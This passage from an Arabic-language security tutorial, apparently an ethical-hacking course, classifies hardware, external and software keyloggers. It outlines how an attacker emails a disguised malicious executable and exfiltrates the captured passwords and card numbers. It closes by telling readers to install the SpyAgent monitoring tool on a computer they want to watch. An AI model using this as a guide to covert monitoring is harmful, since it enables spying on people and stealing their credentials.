رﺻد ﻧﺷﺎط اﺳﺗﺧدام اﻻﻧﺗرﻧت ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﻋن طرﯾﻖ ﺗﺳﺟﯾل ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﺗﻲ ﻗﺎﻣوا ﺑزﯾﺎرﺗﮭﺎ وﻣﻊ اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ -4
اﻟﺗﻲ ﺗم ادﺧﺎﻟﮭﺎ ،اﻟﺦ
ﺗﺳﺟﯾل ﺟﻣﯾﻊ أﺳﻣﺎء اﻟدﺧول ،وأرﻗﺎم اﻟﺑﻧك وﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن ،ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﻔﯾﺔ أو اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ھﻲ -5
ﻋﺑﺎره ﻋن ﻋﻼﻣﺎت اﻟﻧﺟﻣﺔ أو اﻟﻣﺳﺎﻓﺎت اﻟﻔﺎرﻏﺔ.
ﺗﺳﺟﯾل ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت. -6
ﻋﻣل ﻧﺳﺦ ﻏﯾر ﻣﺻرح ﺑﮭﺎ ﻟﻛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺻﺎدرة ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة. -7
Hardware Keyloggersھو ﻋﺑﺎره ﻋن أﺟﮭزة ﺗﺑدو ﻣﺛل ﻣﺣرﻛﺎت أﻗراص .USBﯾﻛون ﻣﺗﺻﻼ ﺑﯾن ﻣﻛوﻧﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ وﻣدﺧل
.USBﯾﺗم ﺗﺧزﯾن ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣﺳﺟﻠﺔ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﺿﻣن وﺣدة اﻷﺟﮭزة .ﺛم ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن ﺑﺎﺳﺗرداد ھذه
اﻟوﺣدة ﻟﻠوﺻول إﻟﻰ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ذﻟك .واﻟﻣﯾزة اﻟرﺋﯾﺳﯾﺔ ﻟﮭذا اﻟﻧوع ھو أﻧﮫ ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮫ ﻣن ﻗﺑل ﺑراﻣﺞ
ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ،وﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ،أو ﺑراﻣﺞ أﻣن ﺳطﺢ اﻟﻣﻛﺗب .وﻟﻛن ﻣن ﻋﯾوﺑﮫ ھو أن ﻟﮫ وﺟود ﻓﻌﻠﻲ ﻣﻣﺎ ﯾﻣﻛن اﻛﺗﺷﺎﻓﮫ ﺑﺳﮭوﻟﺔ.
وﯾﺻﻧف ھذا اﻟﻧوع إﻟﻰ ﺛﻼﺛﺔ أﻧواع رﺋﯾﺳﯾﺔ:
اﻟوﺻول اﻟﻣﺎدي و/أو ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم ﺿروري ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر) ، (Physical and/or admin-level accessﯾﺟب أن ﯾﺗم
ﺗﺣﻣﯾل اﻟﺗطﺑﯾﻖ ﻓﻲ BIOSاﻟﻛﻣﺑﯾوﺗر ﻟﻸﺟﮭزة اﻟﺧﺎﺻﺔ اﻟﺗﻲ ﺳﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ .ﺣﯾث ان اﻟﺑراﻣﺞ اﻟﺛﺎﺑﺗﺔ ﻋﻠﻰ ﻣﺳﺗوى BIOSاﻟﺗﻲ ﺗدﯾر إﺟراءات
ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﯾﻣﻛن ﺗﻌدﯾﻠﮭﺎ ﻻﻟﺗﻘﺎط ھذه اﻷﺣداث ﻣﺛﻠﻣﺎ ﯾﺗم ﻣﻌﺎﻟﺟﺗﮭﺎ.
ﯾﺳﺗﺧدم ھذا اﻟﻛﯾﻠوﺟرز ﻟﺗﺳﺟﯾل أﺣداث ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻋن طرﯾﻖ رﺑط داﺋرة اﻟﺟﮭﺎز ﻣﻊ ﻣوﺻل ﻛﺎﺑل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ .ﻓﺈﻧﮫ ﯾﺳﺟل ﻛل ﺿرﺑﺎت
ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟذاﻛرﺗﮫ اﻟداﺧﻠﯾﺔ اﻟﺧﺎﺻﺔ اﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻓﻲ وﻗت ﻻﺣﻖ .واﻟﻣﯾزة اﻟرﺋﯾﺳﯾﺔ ﻷﺟﮭزة اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ ﺑراﻣﺞ اﻟﻛﯾﻠوﺟرز
ھو أﻧﮫ ﻻ ﯾﻌﺗﻣد ﻋﻠﻰ ﻧوع ﻧظﺎم اﻟﺗﺷﻐﯾل ،وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺈﻧﮫ ﻟن ﯾﺗداﺧل ﻣﻊ أي ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف وأﻧﮫ ﻣن
اﻟﻣﺳﺗﺣﯾل اﻛﺗﺷﺎف أﺟﮭزة اﻟﻛﯾﻠوﺟرز ﺑﺎﺳﺗﺧدام أي ﻣن ﺑرﻧﺎﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻛﯾﻠوﺟرز.
External Keyloggersﯾﺗم رﺑطﮫ ﺑﯾن ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﻌﺗﺎدة واﻟﻛﻣﺑﯾوﺗر .أﻧﮭﺎ ﺗﺳﺟل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح .ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ
) (External Keyloggersﻻ ﺗﺣﺗﺎج إﻟﻰ أي ﻣن اﻟﺑرﻧﺎﻣﺞ ،وﺗﻌﻣل ﻣﻊ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر .ﯾﻣﻛﻧك رﺑطﮭﺎ ﺑﺄي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﺗﺳﺗﮭدﻓﮫ،
ﺣﯾث ﯾﻣﻛﻧﮫ رﺻد اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻟﻠﺑﺣث ﻋن طرﯾﻖ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ .ھﻧﺎك أرﺑﻌﺔ أﻧواع ﻣن ﻛﯾﻠوﺟرز
اﻟﺧﺎرﺟﯾﺔ:
:PS/2 and USB Keyloggerﺷﻔﺎف ﺗﻣﺎﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻌﻣﻠﯾﺎت اﻟﺣﺎﺳوب وﻻ ﯾﺗطﻠب أي ﻣن اﻟﺑراﻣﺞ أو driver’sﻟﻛﻰ ﯾﻌﻣل .ﺗﺳﺟﯾل
ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر ،وﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت ﻣﺛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ،
وﺳﺟﻼت اﻟدردﺷﺔ ،اﻟﺗطﺑﯾﻘﺎت اﻟﻣﺳﺗﻌﻣﻠﺔ ،IMS ،اﻟﺦ.
:Acoustic/CAM Keyloggerﯾﻣﻛﻧﮫ اﺳﺗﺧدام إﻣﺎ ﺟﮭﺎز اﺳﺗﻘﺑﺎل ) (capturing receiverﻗﺎدرة ﻋﻠﻰ ﺗﺣوﯾل اﻷﺻوات
اﻟﻛﮭروﻣﻐﻧﺎطﯾﺳﯾﺔ اﻟﻰ ﺑﯾﺎﻧﺎت اﻟﻣﻔﺎﺗﯾﺢ أو CAMاﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ ﺗﺳﺟﯾل ﻟﻘطﺎت ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ.
:Bluetooth Keyloggerﯾﺗطﻠب اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻣرة واﺣدة ﻓﻘط ،ﻓﻲ وﻗت اﻟﺗﺛﺑﯾت .ﻣرة واﺣدة ﯾﺗم ﺗﺛﺑﯾت ھذا
ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ،ﻓﺈﻧﮫ ﯾﺧزن ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﯾﻣﻛﻧك اﺳﺗرداد ﻣﻌﻠوﻣﺎت ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻣن ﺧﻼل رﺑط
ﺑﺟﮭﺎز اﻟﺑﻠوﺗوث.
:Wi-Fi Keyloggerﯾﻌﻣل ﻟوﺣده ﺗﻣﺎﻣﺎ .ﻋﻠﻰ ﻋﻛس ،Bluetooth Keyloggerھذا اﻟﻧوع ﻣن اﻟﻛﯾﻠوﺟرز ﻻ ﺗﺗطﻠب أن ﯾﻛون ﺑﺎﻟﻘرب
ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺛﺑت ﻋﻠﯾﮫ اﻟدوﻧﺟل )ﺟﮭﺎز اﻟﺗﺳﺟﯾل ﻓﻲ (Bluetooth Keyloggerﻻﺳﺗرداد ﻣﻌﻠوﻣﺎت ﺿﻐطﺔ اﻟﻣﻔﺎﺗﯾﺢ .ھذا
اﻟﻛﯾﻠوﺟرز ﻻ ﯾﺗطﻠب أي ﻣن اﻟﺑراﻣﺞ أو driversوﻏﯾر ﻗﺎﺑل ﻟﻠﻛﺷف ﺗﻣﺎﻣﺎ؛ وﯾﻌﻣل ﻋﻠﻰ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر .ﯾﻘوم ﺑﺗﺳﺟل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ
وﯾرﺳل اﻟﻣﻌﻠوﻣﺎت ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ ﻣدى ﻓﺗرة زﻣﻧﯾﺔ ﻣﺣددة ﻣﺳﺑﻘﺎ.
ھذا اﻟﻧوع ﻣن Loggersھو ﻋﺑﺎره ﻋن ﺑراﻣﺞ ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋن ﺑﻌد ﻋﺑر اﻟﺷﺑﻛﺔ أو ﻣرﻓﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻟﺗﺳﺟﯾل
ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ .ھﻧﺎ ﯾﺗم ﺗﺧزﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻣﺛل ﻣﻠف اﻟﺳﺟل ﻓﻲ اﻟﻘرص اﻟﺻﻠب ﻷﺟﮭزة
اﻟﻛﻣﺑﯾوﺗر .ﻏﯾر ﻣطﻠوب اﻟوﺻول اﻟﻣﺎدي ﻣن ﺟﺎﻧب اﻟﺷﺧص ﻟﻠﺣﺻول ﻋﻠﻰ ﺑﯾﺎﻧﺎت اﻟﺿﻐطﺔ ﻷﻧﮫ ﯾﺗم اﻟﺣﺻول ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت ﻋﺑر اﻟﺑرﯾد
اﻻﻟﻛﺗروﻧﻲ ﻋﻠﻰ ﻓﺗرات ﻣﺣددة ﺳﻠﻔﺎ Software Loggers .ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟﺣﺻول ﻋﻠﻰ ﺑﯾﺎﻧﺎت إﺿﺎﻓﯾﺔ أﯾﺿﺎ،
ﺣﯾث أﻧﮭﺎ ﻻ ﺗﻘﺗﺻر ﻣن ﻗﺑل ﺗﺧﺻﯾص اﻟذاﻛرة اﻟﻣﺎدﯾﺔ ﻣﺛل .Hardware Loggersﯾﺗم ﺗﺻﻧﯾف Software Loggersإﻟﻰ ﺳﺗﺔ أﻧواع.
وھم:
Application Keylogger
Kernel Keylogger
Rootkit Keylogger
Device Driver Keylogger
Hypervisor-based Keylogger
Form-Grabbing-Based Keylogger
Application Keylogger -
Application Keyloggerﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﻛل ﻣﺎ ﯾﻛﺗﺑﮫ اﻟﻣﺳﺗﺧدم ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،واﻟدردﺷﺔ ،وﻏﯾرھﺎ ﻣن اﻟﺗطﺑﯾﻘﺎت ،ﺑﻣﺎ
ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور .ﻣﻊ ھذا ﯾﻣﻛﻧك ﺣﺗﻰ ﺗﺗﺑﻊ ﺳﺟﻼت ﻧﺷﺎط اﻹﻧﺗرﻧت .ھو ﻏﯾر ﻣرﺋﻲ ﺗﻣﺎﻣﺎ ﻟﺗﺗﺑﻊ وﺗﺳﺟﯾل ﻛل ﻣﺎ ﯾﺣدث داﺧل اﻟﺷﺑﻛﺔ
ﺑﺄﻛﻣﻠﮭﺎ.
Kernel Keylogger -
ھذا اﻷﺳﻠوب ﻧﺎدرا ﻣﺎ ﯾﺳﺗﺧدم ﻷﻧﮫ ﻣن اﻟﺻﻌب أن ﯾﻛﺗب ﻛﻣﺎ ﯾﺗطﻠب ﻣﺳﺗوى ﻋﺎل ﻣن اﻟﻛﻔﺎءة ﻣن ﻣطور اﻟﻛﯾﻠوﺟرز .ﻣن اﻟﺻﻌب أﯾﺿﺎ إﻋداده.
ﺗوﺟد ھذه اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ ﻣﺳﺗوى اﻟﻧواة/اﻟﻛﯾرﻧل .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﮭو ﯾﺻﻌب اﻛﺗﺷﺎﻓﮫ ،ﺧﺎﺻﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺗطﺑﯾﻘﺎت وﺿﻊ اﻟﻣﺳﺗﺧدم .ھذا اﻟﻧوع ﻣن
اﻟﻛﯾﻠوﺟرز ﯾﻌﻣل ﻣﺛل ﺑراﻣﺞ ﺗﺷﻐﯾل ﺟﮭﺎز ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ،وﺑﺎﻟﺗﺎﻟﻲ ﺗﺣﻘﻖ ﻣﻛﺎﺳب اﻟوﺻول إﻟﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﻛﺗوﺑﺔ ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ.
Rootkit Keylogger -
Rootkit-based Keyloggerھو ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل ﺟﮭﺎز وﯾﻧدوز ﻣزور اﻟذي ﯾﺳﺟل ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ .ھذا اﻟﻛﯾﻠوﺟرز ﯾﺧﻔﻲ ﻣن اﻟﻧظﺎم
وﻏﯾر ﻗﺎﺑل ﻟﻠﻛﺷف ﺣﺗﻰ ﻣﻊ اﻷدوات اﻟﻘﯾﺎﺳﯾﺔ أو اﻷدوات اﻟﻣﺗﺧﺻﺻﺔ.
Device Driver Keylogger -
ھذا اﻟﻧوع ﻣن اﻟﻛﯾﻠوﺟرز ﯾﻌﻣل ﻋﺎدة ك .Device Driverھو ﯾﺣل ﻣﺣل I/O driverﻣﻊ وظﯾﻔﺔ ال Keyloggingاﻟﻣﺿﻣﻧﺔ .ﯾﺗم ﺣﻔظ
ﻛﺎﻓﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ أﺟرﯾت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻟﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ وﻣن ﺛم ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ اﻟوﺟﮭﺔ ﻣن ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت .ﯾﺗم إﺧﻔﺎء
ﻣﻠﻔﺎت اﻟﺳﺟل اﻟﺗﻲ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ اﻟوﺟﮭﺔ واﻟﺗﻲ ﻛﺗﺑت ﺑواﺳطﺔ اﻟﻛﯾﻠوﺟرز ھذا وأﻧﮭﺎ ﯾﺻﻌب ﺗﻣﯾزھﺎ ﻋن ﻣﻠﻔﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل ،ﺣﺗﻰ أﺛﻧﺎء
اﻟﻘﯾﺎم ﺑﺳرد اﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ واﻟﻣﺟﻠدات.
ﻣﻧﮭﺟﯾﺔ اﻟﮭﺎﻛرز ﻓﻲ اﺳﺗﺧدام Keyloggersﻋن ﺑﻌد )(Methodology Of Attacker In Using Remote Keylogger
ﻟﻌرض اﻟﺑﯾﺎﻧﺎت ﻋن ﺑﻌد ،ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻘوم أوﻻ ﺑﺈﻧﺷﺎء ﻣﻠف ﺗﻧﻔﯾذي ﺧﺑﯾث ) (malicious executable fileوإرﺳﺎل ھذا اﻟﻣﻠف ﻟﻠﺿﺣﯾﺔ
ﻋن طرﯾﻖ اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ )أي إﺧﻔﺎء ﻣﻠف ﺿﺎر وراء ﻣﻠف ﺣﻘﯾﻘﻲ ،ﻣﺛل ﺻورة أو أﻏﻧﯾﺔ( ،أو ﻏﯾر ذﻟك ﻣن ﺧداع اﻟﻣﺳﺗﺧدم ﻟﺗﺣﻣﯾﻠﮫ ﻣن
ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت أو ﺧﺎدم اﻟﺧﺑﯾﺛﺔ .ﺑﻣﺟرد أن ﯾﻧﻘر اﻟﺿﺣﯾﺔ ﻋﻠﻰ ھذا اﻟﻣﻠف اﻟﺧﺑﯾث ،ﯾﺗم ﺗﺛﺑﯾت ﻛﻠوﻏر ﻋﻠﻰ اﻟﻧظﺎم واﻟﺿﺣﯾﺔ ﻻ ﯾﻌرف
أﻧﮫ ﺗم ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ اﻟﻧظﺎم ﻛﻣﺎ أﻧﮫ أﯾﺿﺎ ﻏﯾر ﻣرﺋﻲ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﺿﺣﯾﺔ Keylogger .ﯾﻘوم ﺑﺟﻣﻊ ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن
ﻗﺑل اﻟﻣﺳﺗﺧدم ﺳرا ﺛم ﯾﻘوم ﺑﺣﻔظﮭﺎ إﻟﻰ ﻣﻠف ﻧﺻﻲ أو ﻣﻠف اﻟﺳﺟل .ﻗد ﯾﺣﺗوي ﻣﻠف اﻟﺳﺟل ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ ﻣﺛل أرﻗﺎم اﻟﺣﺳﺎﺑﺎت
اﻟﻣﺻرﻓﯾﺔ وﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وأرﻗﺎم اﻟﮭواﺗف واﻟﻌﻧﺎوﯾن واﻟﺦ .ﺑﻣﺟرد ارﺗﺑﺎط اﻟﺿﺣﯾﺔ ﺑﺎﻹﻧﺗرﻧت ،ﯾﺗم إرﺳﺎل ھذه اﻟﻣﻠﻔﺎت
إﻟﻰ ﻣوﻗﻊ ﺑﻌﯾد ﻛﻣﺎ ﺗم اﻋداده ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم .ھﻧﺎ اﻟﻣﮭﺎﺟم ﻻ ﯾﺣﺗﺎج إﻟﻰ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ.
Acoustic/CAM Keyloggers
Acoustic Keyloggersﯾﻌﻣل ﻋﻠﻰ ﻣﺑدأ ﺗﺣوﯾل اﻟﻣوﺟﺎت اﻟﺻوﺗﯾﺔ إﻟﻰ ﺑﯾﺎﻧﺎت ﻛﮭروﻣﻐﻧﺎطﯾﺳﯾﺔ .ھذا اﻟﻣﻔﮭوم ھو أن ﻛل ﻣﻔﺗﺎح ﻋﻠﻰ ﻟوﺣﺔ
اﻟﻣﻔﺎﺗﯾﺢ ﻟﮫ ﺻوت ﻣﺧﺗﻠف ﻗﻠﯾﻼ ﻋﻧد اﻟﺿﻐط ﻋﻠﯾﮫ .ھﻧﺎك أﺟﮭزة ﺗﻧﺻت اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ اﻟﻛﺷف ﻋن اﻻﺧﺗﻼﻓﺎت اﻟدﻗﯾﻘﺔ ﺑﯾن اﻷﺻوات ﻣﻊ
ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح واﺳﺗﺧدام ھذه اﻟﻣﻌﻠوﻣﺎت ﻟﺗﺳﺟﯾل ﻣﺎ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم.
The acoustic Keyloggerﯾﺗطﻠب اﻟﻛﺛﯾر ﻣن اﻟﺗﻌﻠم " "learning periodأي ﺣواﻟﻰ 1،000أو أﻛﺛر ﻣن اﻟﺿﻐطﺎت ﻟﺗﺣوﯾل
اﻷﺻوات اﻟﻣﺳﺟﻠﺔ اﻟﻰ ﺑﯾﺎﻧﺎت .ﯾﺗم ذﻟك ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﺧوارزﻣﯾﺔ ﺗردد اﻷﺻوات اﻟﻣﺳﺟﻠﺔ .ﻟﺗﺣدﯾد ﺗواﻓﻖ اﻟﺻوت ﻣﻊ أي ﻣﻔﺗﺎح ،ﯾﺳﺗﺧدم
acoustic Keyloggerاﻟﺑﯾﺎﻧﺎت اﻹﺣﺻﺎﺋﯾﺔ ﻋﻠﻰ أﺳﺎس اﻟﺗردد اﻟذي ﯾﺳﺗﺧدم ﻣﻊ ﻛل ﻣﻔﺗﺎح ﻷﻧﮫ ﺳﯾﺗم اﺳﺗﺧدام ﺑﻌض اﻟﺣروف أﻛﺛر ﺑﻛﺛﯾر
ﻣن ﻏﯾرھﺎ.
A CAM Keyloggerﯾﺟﻌل اﺳﺗﺧدام اﻟﻛﺎﻣﯾرا ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ .ﺣﯾث ﺗﻘوم اﻟﻛﺎﻣﯾرا اﻟﻣﺛﺑﺗﺔ ﺑﺄﺧذ ﻟﻘطﺎت ﻣن ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺛم
ﺗﻘوم ﺑرﺻدھﺎ وﻣن ﺛم ارﺳﺎل ﺳﺟل اﻟﻠﻘطﺎت إﻟﻰ ﺣﺳﺎب اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻓﺗرات دورﯾﺔ .ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗرداد اﻟﻣﻌﻠوﻣﺎت ﻣن ﺧﻼل اﻟﺗﺣﻘﯾﻖ ﻣن
ﻟﻘطﺎت اﻟﺷﺎﺷﺔ اﻟﺗﻲ ﺗم إرﺳﺎﻟﮭﺎ ﻣن ﻗﺑل .CAM Keylogger
Keyloggers
ﺑﺟﺎﻧب اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﻣت ﻣﻧﺎﻗﺷﺗﮭﺎ ﺳﺎﺑﻘﺎ ،acoustic/CAM Keyloggers ،ﻓﮭﻧﺎك ﻛﯾﻠوﺟرز أﺧرى ﺧﺎرﺟﯾﺔ واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ
ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن اﻟﻧظﺎم ﻟﺷﺧص ﻣﺎ .ﯾﻣﻛن أن ﺗﻌﻠﻖ ھذه ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ ﺑﯾن ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﻌﺗﺎدة وﺟﮭﺎز ﻛﻣﺑﯾوﺗر
ﻟﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح.
Spytech SpyAgentھو ﺑرﻧﺎﻣﺞ ﻟﺗﺳﺟﯾل ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ واﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻟﻠﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم اﻟذي ﺗم
اﻟﺗﺛﺑﯾت ﻋﻠﯾﮫ .ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ أن ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ اﻷﻣور اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم:
-ﯾﻛﺷف ﻋن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ.
-ﯾﺳﺟل ﺟﻣﯾﻊ ﻋﻣﻠﯾﺎت اﻟﺑﺣث اﻟﺗﻲ ﻧﻔذت ﻋﻠﻰ اﻻﻧﺗرﻧت.
-ﻣراﻗﺑﺔ ﻣﺎ ھﻲ اﻟﺑراﻣﺞ واﻟﺗطﺑﯾﻘﺎت ﻗﯾد اﻻﺳﺗﺧدام.
-ﯾﺳﺟل ﻛل اﺳﺗﺧدام اﻟﻣﻠﻔﺎت واﻟﻣﻌﻠوﻣﺎت اﻟطﺑﺎﻋﺔ.
-ﯾﺳﺟل ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت.
-ﺑل ھو أﯾﺿﺎ ﻗﺎدرا ﻋﻠﻰ رؤﯾﺔ ﻛل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم.
-ﯾﺳﺎﻋد ﻋﻠﻰ ﺗﺣدﯾد ھل اﻟﻣﺳﺗﺧدم ﯾﻘوم ﺑﺎﻟﺗﺣﻣﯾل) (downloadingأو ﯾﻘوم ﺑﺎﻟرﻓﻊ ).(uploading
-ﯾﻛﺷف ﻛﻠﻣﺎت اﻟﺳر ﻟﻠﻣﺳﺗﺧدم اﻟﺳرﯾﺔ.
ﯾﻣﻛﻧك ﺗﺣﻣﯾل ھذا اﻟﺑرﻧﺎﻣﺞ ﻣن اﻟﻣوﻗﻊ اﻟرﺳﻣﻲ ﻟﮫ وﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗرﯾد ﻣراﻗﺑﺗﮫ ،وﺑﻌد ذﻟك ﻓﻘط اﻧﻘر ﻓوق ﺑدء اﻟرﺻد .ھذا ﻛل
